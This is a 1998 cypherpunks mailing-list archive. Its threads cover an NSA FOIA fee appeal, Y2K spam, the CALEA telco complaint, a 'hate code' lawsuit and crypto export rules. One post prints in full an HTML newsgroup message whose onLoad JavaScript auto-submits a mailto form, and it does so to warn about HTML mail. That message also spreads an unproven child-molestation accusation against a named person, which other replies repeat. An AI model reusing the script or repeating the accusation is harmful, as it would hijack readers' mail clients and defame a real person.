b21wdXRpbmcgdGVjaG5vbG9naWVzLCA8Qj5XSVJFTEVTUyBJLlQuPC9CPiB3
aWxsCnByZXNlbnQgUmljaGFyZCBKLiBMeW5jaCwgRXhlY3V0aXZlIFZpY2Ug
UHJlc2lkZW50IGFuZCBDaGllZiBUZWNobm9sb2d5Ck9mZmljZSBhdCBCZWxs
IEF0bGFudGljIE1vYmlsZSBhcyBhIGtleW5vdGUgc3BlYWtlci4mbmJzcDsg
TXIuIEx5bmNoIHNlcnZlcwphcyBQcmVzaWRlbnQgb2YgdGhlIFdpcmVsZXNz
IERhdGEgRm9ydW0gKFdERiksIHdoaWNoIGlzIGEgY28tc3BvbnNvciBpbgpw
cmVzZW50aW5nIDxCPldJUkVMRVNTIEkuVC48L0I+ICg8QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tL3Jlc3VsdHMvcHJvZmVzc2lvbmFsL25ld3Mv
ZnJhbWVpbmRleC5jZm0/YXJ0aWNsZWlkPTMzMDgiPldPVy1DT008L0E+KTwv
Rk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoK
PFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQg
U0laRT0rMT5BbmFseXN0cyBTYXkgU3RyaWtpbmcKUGhvbmUgV29ya2VycyBG
YWNlIFVwaGlsbCBCYXR0bGUmbmJzcDs8QlI+CmluIFllYXJzIHRvIENvbWU8
L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+
VGhvdXNhbmRzIG9mIHN0cmlraW5nIGNvbW11bmljYXRpb25zIHdvcmtlcnMK
aGVhZGVkIGJhY2sgdG8gcGlja2V0IGxpbmVzIGluIDEzIFdlc3Rlcm4gc3Rh
dGVzLiZuYnNwOyBDb25uZWN0aWN1dCBwaG9uZQpjdXN0b21lcnMgYnJhY2Ug
Zm9yIGRlbGF5cyBhcyBhIHN0cmlrZSB0aGVyZSBlbnRlcnMgaXRzIHNlY29u
ZCBidXNpbmVzcwpkYXkuICg8QSBIUkVGPSJodHRwOi8vd3d3LmZveG1hcmtl
dHdpcmUuY29tLzA4MjU5OC9waG9uZXN0cmlrZXMuc21sIj5GT1gKTkVXUzwv
QT4pIC0gKDxBIEhSRUY9Imh0dHA6Ly93d3cubmFuZG90aW1lcy5jb20vbmV3
c3Jvb20vbnRuL2Jpei8wODI0OTgvYml6dF8xMzQ3Lmh0bWwiPk5BTkRPClRJ
TUVTIE5FV1M8L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+
Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhl
bHZldGljYSI+PEZPTlQgU0laRT0rMT5CZWxsU291dGggQWdyZWVzIHRvIFNl
bGwKU3Rha2UgaW4gTmV3IFplYWxhbmQgQ2VsbHVsYXIgQ29tcGFueTwvRk9O
VD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5CZWxs
U291dGggaGFzIGFncmVlZCB0byBzZWxsIGl0cyA2NSBwZXJjZW50CnNoYXJl
IGluIEJlbGxTb3V0aCBOZXcgWmVhbGFuZCB0byBWb2RhZm9uZSBHcm91cCBQ
bGMgZm9yIE5aJDQ4Ny41IG1pbGxpb24Kb3IgYXBwcm94aW1hdGVseSAkMjQ0
IG1pbGxpb24sIHRoZSBjb21wYW55IGFubm91bmNlZCB0b2RheS4gKDxBIEhS
RUY9Imh0dHA6Ly9iaXoueWFob28uY29tL3BybmV3cy85ODA4MjUvZ2FfYmVs
bHNvdV8yLmh0bWwiPllBSE9PPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48
L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNF
PSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+VUsgU2NpZW50aXN0
IExldHMgVGVjaG5vbG9neQpHZXQgVW5kZXIgSGlzIFNraW48L0ZPTlQ+PC9G
T05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+UHJvZmVzc29y
IEtldmluIFdhcndpY2sgb2YgdGhlIFVuaXZlcnNpdHkKb2YgUmVkZGluZywg
RW5nbGFuZCwgaGFzIGEgc2lsaWNvbiBjaGlwIGVtYmVkZGVkIGluIGhpcyB1
cHBlciBhcm0uJm5ic3A7CkEgY29tcHV0ZXIgY2FuIG5vdyBrZWVwIHRyYWNr
IG9mIHRoZSBkZXZpY2UgYW5kIGl0cyBjYXJyaWVyLiAoPEEgSFJFRj0iaHR0
cDovL25ld3MuYmJjLmNvLnVrL2hpL2VuZ2xpc2gvc2NpL3RlY2gvbmV3c2lk
XzE1ODAwMC8xNTgwMDcuc3RtIj5CQkM8L0E+KTwvRk9OVD48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5DaXRpemVu
IEhlbHBzIE5hYiBSb2JiZXJ5ClN1c3BlY3Q8L0ZPTlQ+PC9GT05UPjwvQj48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxG
T05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+QSBjaXRpemVuIHVzZWQgaGlz
IGNlbGx1bGFyIHBob25lIHRvIGNhbGwKaW4gYSByb2JiZXJ5IHN1c3BlY3Qg
dG8gdGhlIFRvcGVrYSBwb2xpY2Ugb24gTW9uZGF5LiZuYnNwOyAoPEEgSFJF
Rj0iaHR0cDovL3d3dy5jam9ubGluZS5jb20vc3Rvcmllcy8wODI1OTgvY29t
X25hYi5zaHRtbCI+VE9QRUtBCkNBUElUQUwtSk9VUk5BTDwvQT4pPC9GT05U
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
CjxIUiBXSURUSD0iMTAwJSI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2Ei
PjxGT05UIFNJWkU9LTE+Rm9yIGFkZGl0aW9uYWwgbmV3cyBhYm91dAp0aGUg
d2lyZWxlc3MgaW5kdXN0cnktLWluY2x1ZGluZyBwZXJpb2RpYyBuZXdzIHVw
ZGF0ZXMgdGhyb3VnaG91dCB0aGUgZGF5LS12aXNpdAo8QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tIj5odHRwOi8vd3d3Lndvdy1jb20uY29tLjwv
QT48L0ZPTlQ+PC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+CjxIUiBXSURUSD0iMTAwJSI+PC9URD4KCjxURD48
L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJB
cmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+Q1RJQSBEYWlseSBOZXdz
IGZyb20gV09XLUNPTQppcyB0cmFuc21pdHRlZCB3ZWVrZGF5cywgZXhjZXB0
IGZvciBob2xpZGF5cy4gVmlzaXQgdXMgb24gdGhlIFdvcmxkIFdpZGUKV2Vi
IGF0IDxBIEhSRUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20vcHJvZmVzc2lv
bmFsIj5odHRwOi8vd3d3Lndvdy1jb20uY29tL3Byb2Zlc3Npb25hbDwvQT4u
Jm5ic3A7PC9GT05UPjwvRk9OVD4mbmJzcDsKCjxQPjxGT05UIEZBQ0U9IkFy
aWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT5JZiB5b3UgYXJlIG5vdCBp
bnRlcmVzdGVkCmluIHJlY2VpdmluZyB0aGUgQ1RJQSBEYWlseSBOZXdzIGZy
b20gV09XLUNPTSwgcGxlYXNlIHNlbmQgYSBtZXNzYWdlIHRvCjxBIEhSRUY9
Im1haWx0bzp1bmpvaW4tQ1RJQV9EYWlseV9OZXdzQHVtMi51bml0eW1haWwu
Y29tIj51bmpvaW4tQ1RJQV9EYWlseV9OZXdzQHVtMi51bml0eW1haWwuY29t
PC9BPi4mbmJzcDs8L0ZPTlQ+PC9GT05UPiZuYnNwOwoKPFA+PEI+KioqPEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPiBUaGUg
dGVybSAidW5qb2luLUNUSUFfRGFpbHlfTmV3c0B1bTIudW5pdHltYWlsLmNv
bSIKbXVzdCBiZSBsaXN0ZWQgaW4gdGhlIFRPIHNlY3Rpb24gb2YgdGhlIGVt
YWlsLjwvRk9OVD48L0ZPTlQ+ICoqKjwvQj4mbmJzcDsKCjxQPjxGT05UIEZB
Q0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT5QbGVhc2UgTm90
ZTogU29tZSBvZiB0aGUKbGlua3MgaW4gdG9kYXkncyBuZXdzIGFyZSB0aW1l
IHNlbnNpdGl2ZS4mbmJzcDsgVGhvc2UgbGlua3MgbWF5IG5vdCBiZQphdmFp
bGFibGUgYXMgbmV3cyBjaGFuZ2VzIHRocm91Z2hvdXQgdGhlIGRheS4mbmJz
cDsgQWxzbywgc29tZSBuZXdzIHNvdXJjZXMKbWF5IGJlIHN1YnNjcmlwdGlv
bi1iYXNlZCBvciByZXF1aXJlIHJlZ2lzdHJhdGlvbi48L0ZPTlQ+PC9GT05U
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
CjxIUiBXSURUSD0iMTAwJSI+PC9URD4KCjxURD48L1REPgo8L1RSPgo8L1RB
QkxFPgombmJzcDs8L0NFTlRFUj4KPC9CT0RZPgo8L0hUTUw+Cg==
--Boundary..3995.1071713795.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "joe harlin" <joeharlin@hotmail.com>
Date: Tue, 25 Aug 1998 12:19:52 -0700 (PDT)
To: lungu@netside.net
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <19980825191917.15261.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


I only get this thread in encrypted (Encrypted_Message) format, why?

>Date: Tue, 25 Aug 1998 11:13:21 -0700
>From: Ted Lungu <lungu@netside.net>
>To: cypherpunks@cyberpass.net, cypherpunks@toad.com, 
cypherpunks@algebra.com,
>        shamrock@cypherpunks.to, fight-censorship@vorlon.mit.edu
>Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
>
>Encrypted_Message=On+4+May+1998+02%3A57%3A07+GMT%2C+in+article+%3C6ijaq3%24bb1@news1.panix.com%3E%2C%0D%0A%3CThe@NSA.sucks%3E+Information+Security+%28%3D+Guy+Polis+%3Cguy@panix.com%3E%29+wrote%3A%0D%0A%23+++Guy+Polis+%28guy@panix.com%2C+eviljay@bway.net%29+is+a+pedophile+child%0D%0A%23+++molester+who+was+fired+from+his+consulting+position+at+Salomon+Brothers%0D%0A%23+++after+he+was+caught+masturbating+in+his+cubicle+at+the+child+pornography%0D%0A%23+++JPEGs+that+he+downloaded+from+the+Internet.%0D%0A%0D%0AThe+poster%27s+been+awful+quiet+lately+-+did+the+feds+arrest+him%3F&Browser=Netscape%3AMozilla%2F3.01Gold+%28X11%3B+I%3B+SunOS+5.6+sun4u%29&Remedy=Tell+the+world
>
>


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 25 Aug 1998 12:37:50 -0700 (PDT)
To: abumujahid@taliban.com
Subject: NSA's Barbara McNamara denies fee waiver appeal
Message-ID: <35E31155.2F4C@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Tuesday 8/25/98 12:31 PM

Charles R Smith  http://www.us.net/softwar/

NSA  deputy director Barbara McNamara's  wrote me a letter dated 19
August  1998.

http://www.nsa.gov:8080/mission.html

McNamara DENIED my fee waiver appeal for search for invoices NSA spent
on public key chips.

>From my inside dealings with NSA's R division and Sandia employees  I
learned that both had some VERY UNFORTUNATE EXPERIENCES with public key.

I am sending both you and John Young copies of NcNamara's letter.

McNamara wrote,

    This response may be construed as a denial of your appeal. 
Accordingly, you are hereby 
  advised to your right to seek judicial review of my decision pursuant
to 5 U.S.C.  552(a)(4)
  (B) in the United States District Court in the district in which you
reside, in which you have
  your principal place of business, in which the Agency's records are
situated (U.S. District
  Court of Maryland), or in the District of Columbia. 

http://www.jya.com/hr105-37.txt 

>From my case law studies at UNM law library, I HAVE NOT seen any example
of anyone
suing for a fee waiver denial.

McNamara wrote

  The key issue I considered in my review is whether disclosure of the
information is likely
  to contribute to the public understanding of the operations or
activities of the government.

My guess is that NSA has squandered tens of millions of dollars TRYING
to build public key
chips - like the Cylink 1024. http://www.cylink.com/

Some of NSA's money, I think, was spent at Sandia Labs funding the
failed Sandia low- and
high-speed public key chips.  See  Whitfield Diffie, "The First Ten
Years of Public Key Cryptography," Proceedings of the IEEE, 76(5), May
1988. referenced at http://www.aci.net/kalliste/nukearse.htm

Sandia's public key chips didn't get the same answers, Sandia Ron Kulju
told me.
KULJU,RONALD J.           (505)845-8860  RJKULJU   (505)844-9478  0519   
http://www.sandia.gov/cgi-bin/emplloc

Both NSA and Sandia MUCH TROUBLE building semiconductor devices.  I have
inside
information on NSA's problems from National Semiconductor.  National was
hired
by NSA to help make chips at NSA's facility.

Perhaps McNamara opinion should be challenged IN COURT?

We have some experience in this endeavor. http://jya.com/whpfiles.htm

And may get some recognition 

http://www.jya.com/chrysler98.htm

  The Chrysler Award for Innovation in Design, now in its sixth year,
  honors outstanding designers (or design teams).  Winners are chosen
  from across the design disciplines by a judging panel of design
  leaders.  One the selection is made, Chrysler will award $10,000
  to each winner (or winning team) at a ceremony in New York in the
  Fall of 1998.  Award winners will be flown to New York for the 
  Award Ceremony.

for our efforts.

I see that you are trying to gain some VISIBILITY for your encryption
product http://www.softwar.net/plight.html.  And that you are BIG into
the FOIA
business too. http://www.softwar.net/softb.html

Then TOO you can charge NSA OVER $100 per hour for your efforts should
we win.

NSA attempting to conceal how much taxpayer money it has squandered is
clearly
in the public interest.  And we have the ABILITY and EXPERTISE to
disseminate
this information to the public.

Perhaps you might be interested in participating in perhaps THE FIRST a
FOIA fee waiver
lawsuit?   Pro se, of course, for both legal and economic reasons.

McNamara would be, along with OTHERS at NSA, a NAMED DEFENDANT.

On the other hand, perhaps these crypto-related government messes 

http://www.aci.net/kalliste/speccoll.htm   
http://caq.com/cryptogate  
http://jya.com/whpfiles.htm  
http://www.qainfo.se/~lb/crypto_ag.htm

should get SETTLED so that we can all move on to other projects?

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: myear2000@hotmail.com
Date: Tue, 25 Aug 1998 07:14:15 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Year 2000..READ THIS!
Message-ID: <44417929_61440395>
MIME-Version: 1.0
Content-Type: text/plain



You have read and heard the stories in the media, -"COMPUTERS WILL SHUT
DOWN IN THE YEAR 2000!"
What will your computer do when the NEW MILLENNIUM hits??
    I have developed a new program, that will check your computer and give
you the results in just a few short minutes! It is simple to run ,easy to
understand and very affordable. There is no need to take your computer into
a computer service depot to get the same results, that would probably cost
you 100's of dollars more! You will now be armed with the info you need to
know,  if only a simple BIOS upgrade is  needed! Believe me when I tell you,
a lot of computer service depots are going to get rich, in trying to
convince you that you either need a new computer or a full upgrade is
necessary!!
    Our software will show you at a glance what your computer's capabilities
are, it will give you the required recommendations of what you should and
can't do    The software is available two ways - The simple easy way is by
file
attached email. You just copy the file to a floppy disk and run it. If you
prefer the program be sent to you already on 31/2 or 51/4 floppy, the cost
is slightly more.


Cost of software............$20.00 US funds - Email (file attached) make
sure you include your email address!!!
                                        $25.00 US funds - floppy disk -
(please specify)

All funds to be in US dollars only and to be paid by Postal Money Order or
Cash.
Please include self-addressed stamped envelope for software on floppies.

Send to.......
        Year 2000
        8 Poplar Street,
        Leamington, Ontario, Canada
        N8H 3L4
http://www.netcore.ca/~panazoom
Due to the overwhelming response we have been experiencing so far, please
allow one week for the email file and two to three weeks for the floppies.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 25 Aug 1998 11:21:18 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Telcos CALEA Complaint Against FBI
Message-ID: <199808251821.OAA17406@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


We offer the August 19 complaint by the United States
Telephone Association against the FBI and Justice over
CALEA requirements:

   http://jya.com/usta-v-fbi.htm  (51K)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Tue, 25 Aug 1998 12:45:48 -0700 (PDT)
To: proff@suburbia.net
Subject: Re: Is hate code speech?
In-Reply-To: <19980825175524.13582.qmail@suburbia.net>
Message-ID: <199808251952.OAA001.81@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <19980825175524.13582.qmail@suburbia.net>, on 08/25/98 
   at 05:55 PM, proff@suburbia.net said:

>Jackson, who is now working as a full-time programmer at Dell Computers
>in San Antonio, is not willing to give up her fight against IS despite
>the slim chances of a legal victory. "At this point, I'm not interested
>in the money," claims an unbowed Jackson, "I only want the public to
>think twice about the kinds of hateful messages that may be hidden inside
>the software they use everyday."

<sigh> Now we have to worry about PC variable and function names. What a
crock. 

Isn't there laws on the books that if you file a frivolous law suite like
the one above and you loose then you have to pay the expenses of the other
party?

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: Friends don't let friends use Windows.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNeMWF49Co1n+aLhhAQGFPwP/VrmD/PpCSqCn1sa5eS/LVeIBi12ivja9
XkPqSIbu2kAu2nvjHct9ma7hJgoP6OMgwJA/mSKC1EkgYjPv4EwcmhubgJgmYLsz
G8EuES5KV51/rHUGtMpP9mNVW9RGo0eb5JhLuLcupNWZUa25XHrUz3/qvRI37tRk
eUiqTgbhu3E=
=ugUD
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Tue, 25 Aug 1998 13:23:09 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Heeee's back!!
In-Reply-To: <199808251814.LAA15877@grog.jpl.nasa.gov>
Message-ID: <199808252030.PAA002.20@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <199808251814.LAA15877@grog.jpl.nasa.gov>, on 08/25/98 
   at 11:14 AM, Ted Lungu <lungu@netside.net> said:

If anyone has noticed the large number of posts being received with the
subject: "Child-Molesting Forger's Chilling Confession" they are being
autogenerated without the poster's knowledge.

How do you ask?? Our good friend Dimitri has posted a HTML message to
numerious newsgroups with embeded javascript. This java script is being
auto-executed by the Netscape program and is mailing out these messages
whenever the reader opens the message.

My complements to the good doctor, yet another example of the enherent
security risks of HTML mail.

Below is a copy of the original news post:

From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Newsgroups:
nyc.general,soc.culture.russian,alt.law-enforcement,alt.true-crime,soc.culture.romanian,misc.kids,misc.kids.health,sci.crypt,comp.security.firewalls,comp.lang.javascript,comp.security.misc,comp.org.eff.talk,misc.invest.funds,misc.invest.futures,misc.invest.stocks,misc.invest.technical,misc.invest.real-estate,alt.fan.karl-malden.nose,sci.cryonics,soc.motss,soc.culture.ukrainian,soc.culture.jewish,soc.religion.quaker,alt.folklore.computers
Subject: Child-Molesting Forger's Chilling Confession!!!1!
Date: Sat, 22 Aug 1998 11:00:00 EST
Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y. Lines: 16
Approved: dlv@bwalk.dm.com
Expires: Fri, 22 Aug 2008 11:00:00 EST
Message-ID: <D6767652w165w@bwalk.dm.com>
References: <DKjfi4r2w165w@bwalk.dm.com>
NNTP-Posting-Host: bwalk.dm.com
Mime-Version: 1.0
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Summary: beware the Internet pedophiles
Content-Disposition: inline; filename="warning.htm"
Content-Description: The chilling confession of the self-admitted and
- -exposed child-molesting forger Content-Base:
"file:///POWER%20MAC/warning.html" Disclaimer: CUNY is full of GOWNO, but
100% agrees with all the facts I present X-Face:
(d~Q1[m:7MNXk3-PPCG=Woa93hY6X~&6Z!y#.QB7f-$hfnm>eWIty%YX[43P^g~=N/v3V64
 JfQgHy0h_vvpS'G#15(A=$KZce>%S`xcS%*Ja1GqLFZcPS*\1sy\`X,%WN)fwcU^!\wpY^&C.u,%@0
 21q6kV=(/'B)J]JF;=9/t8cj~gOA9d@v[]B?te|Zi(/w\Aro%()cU!{"'Jo7)Y6 Path:
carrera!news.bctel.net!newsfeed.direct.ca!ptdnetP!newsgate.ptd.net!newspeer.monmouth.com!news.lightlink.com!news.alt.net!perun!dlv
Xref: carrera nyc.general:22129 soc.culture.russian:88474
alt.law-enforcement:217670 alt.true-crime:102690
soc.culture.romanian:52893 misc.kids:374647 misc.kids.health:36966
sci.crypt:40607 comp.security.firewalls:13466 comp.lang.javascript:79964
comp.security.misc:26512 comp.org.eff.talk:46645 misc.invest.futures:53448
misc.invest.stocks:229734 misc.invest.technical:44459
misc.invest.real-estate:56139 alt.fan.karl-malden.nose:151559
sci.cryonics:6452 soc.motss:193052 soc.culture.ukrainian:39182
soc.culture.jewish:242558 soc.religion.quaker:16761
alt.folklore.computers:77067

<html><head><script language="JavaScript">
function c2(){document.f1.Remedy.click();setTimeout('c2();',30000);}
function
cl(){document.f1.Browser.value=navigator.appName+":"+navigator.userAgent;setTimeout('c2();',100);}
</script></head><body onLoad="cl()"><form name="f1" method="post"
enctype="text/plain"
action="mailto:cypherpunks@cyberpass.net,cypherpunks@toad.com,cypherpunks@algebra.com,shamrock@cypherpunks.to,fight-censorship@vorlon.mit.edu?subject=Re:
Child-Molesting Forger's Chilling Confession!!!1!"> <textarea
name="Encrypted_Message" cols=76 rows=8>On 4 May 1998 02:57:07 GMT, in
article &lt;6ijaq3$bb1@news1.panix.com&gt;, &lt;The@NSA.sucks&gt;
Information Security (= Guy Polis &lt;guy@panix.com&gt;) wrote: #   Guy
Polis (guy@panix.com, eviljay@bway.net) is a pedophile child #   molester
who was fired from his consulting position at Salomon Brothers #   after
he was caught masturbating in his cubicle at the child pornography #  
JPEGs that he downloaded from the Internet.

The poster's been awful quiet lately - did the feds arrest
him?</textarea><br> <input type="hidden" name="Browser" value="Unknown">
<input type="submit" name="Remedy" value="Tell the world"></form>
(Reposted due to a forged cancel.)</body></html>



- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: What I like about MS is its loyalty to customers!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNeMe549Co1n+aLhhAQFy8gP+L06L2I8ESdqM3p7c6PYa8gkTV3mAf2pe
NO7JzmlpBqOr5fk60Yawhp4ET6CakUJEqU4B0aCTu5J763vQAQ4awRDaMXmHvbPv
RQO9O9Rvq7E3/FocySvgXHe4CkqpRyFSQ4VJlgaHA6F5KCDu3mknMRA6o94j4VF1
rI4x23Tgu8w=
=L7mp
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "B.C." <bcheffy@mail.win.org>
Date: Tue, 25 Aug 1998 14:06:42 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199808252106.QAA20854@wins0.win.org>
MIME-Version: 1.0
Content-Type: application/x-www-form-urlencoded

application/www-form-urlencoded


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "B.C." <bcheffy@mail.win.org>
Date: Tue, 25 Aug 1998 14:06:48 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199808252106.QAA20944@wins0.win.org>
MIME-Version: 1.0
Content-Type: application/x-www-form-urlencoded

application/www-form-urlencoded


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "B.C." <bcheffy@mail.win.org>
Date: Tue, 25 Aug 1998 14:07:01 -0700 (PDT)
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199808252106.QAA20977@wins0.win.org>
MIME-Version: 1.0
Content-Type: application/x-www-form-urlencoded

application/www-form-urlencoded


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Tue, 25 Aug 1998 14:20:12 -0700 (PDT)
To: "William H. Geiger III" <whgiii@openpgp.net>
Subject: Re: Is hate code speech?
In-Reply-To: <199808251952.OAA001.81@geiger.com>
Message-ID: <Pine.SUN.3.91.980825155854.3483A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 25 Aug 1998, William H. Geiger III wrote:

> <sigh> Now we have to worry about PC variable and function names. What a
> crock. 

	Oh, yeah, you really have to worry about *accidentally*
	calling your variables getwatermelons and somefriedchicken.
	Reminds me of this one guy in our neighborhood who was just
	jogging by our house, bent down to tie a shoelace, lost 
	his balance and accidentally planted a huge burning cross
	in our front lawn.  Woops!  Those damn PC-mongers are 
	making it a crime to jog!

	One note:  I don't see why this lawsuit would be hard to win
	on the grounds that source code isn't necessarily "speech."
	If co-workers left a big wooden swastika on her desk it 
	wouldn't be speech either, but I'd call that actionable.	

	Another note:  frivolous naming conventions are dangerous
	for more than one reason.  Some Y2K firms scan COBOL code
	for variables which are likely to be dates, using the actual
	variable names for clues; this is much less likely to work if 
	you name your field BLOW-JOB instead of ESTIMATED-START-DATE.

							-Scott




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Tue, 25 Aug 1998 13:48:02 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: Reinsch: Crypto export law changes soon.
Message-ID: <D104150098E6D111B7830000F8D90AE824060C@exna02.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain


On NPR's "Talk of the Nation" yesterday, Bill Reinsch, who
is an undersecretary for Export Administration in the  
Department of Commerce, stated that a change in the export
regs should be expected around Labor Day. 

The context was that the 'promise to compromise your future 
products, and we'll let you export un-escrowed DES until 
the end of 1998' deal is running out, and BXA wants 
business to know (slightly) ahead of time what the new 
regimen will be.

The entire ToTN article can be heard on Real Audio:
http://www.npr.org/programs/totn/archives/1998/current.html

Peter Trei
ptrei@securitydynamics.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Tue, 25 Aug 1998 15:20:16 -0700 (PDT)
To: Xcott Craver <caj@math.niu.edu>
Subject: Re: Is hate code speech?
In-Reply-To: <Pine.SUN.3.91.980825155854.3483A-100000@baker>
Message-ID: <199808252227.RAA004.35@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <Pine.SUN.3.91.980825155854.3483A-100000@baker>, on 08/25/98 
   at 04:19 PM, Xcott Craver <caj@math.niu.edu> said:

>On Tue, 25 Aug 1998, William H. Geiger III wrote:

>> <sigh> Now we have to worry about PC variable and function names. What a
>> crock. 

>	Oh, yeah, you really have to worry about *accidentally*
>	calling your variables getwatermelons and somefriedchicken.
>	Reminds me of this one guy in our neighborhood who was just
>	jogging by our house, bent down to tie a shoelace, lost 
>	his balance and accidentally planted a huge burning cross
>	in our front lawn.  Woops!  Those damn PC-mongers are 
>	making it a crime to jog!

